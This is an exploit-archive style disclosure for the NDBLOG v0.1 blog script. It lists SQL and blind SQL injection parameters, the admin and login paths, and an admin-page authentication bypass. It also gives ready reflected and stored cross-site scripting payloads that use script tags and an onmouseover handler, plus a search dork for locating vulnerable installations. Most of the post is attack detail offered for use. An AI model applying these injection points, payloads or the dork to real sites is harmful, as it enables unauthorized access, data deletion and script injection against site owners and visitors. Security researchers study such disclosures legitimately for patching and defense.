facebook facebook twitter rss

NDBLOG version 0.1 multi Vulnerability

Author: indoushka , Published: 25-10-2014
NDBLOG version 0.1 multi Vulnerability
======================================
Author : indoushka
Vondor : ALAMARAB2.com
Dork : جميع الحقوق محفوظة © - ALAMARAB2.com - NDBLOG v_0.1
==================================================

Sql injection :

http://localhost/ND/blog.php?id=85 (inject her)

Blind SQL Injection :

http://localhost/ND/blog.php?action=delete&id=11 (inject her)

Panel = localhost/ND/admin/

Login = http://localhost/ND/login.php

Cross site scripting (verified) :

URL encoded POST input user was set to 1'"()&%<ScRiPt >prompt(999862)</ScRiPt>

Cross site scripting [stored] (verified) :

URL encoded POST input img was set to 1" onmouseover=prompt(976473) bad="
The input is reflected in http://localhost/ND/
The input is reflected inside a tag parameter between double quotes.

by Pass :

http://localhost/ND/admin/menu.php

Like us on Facebook :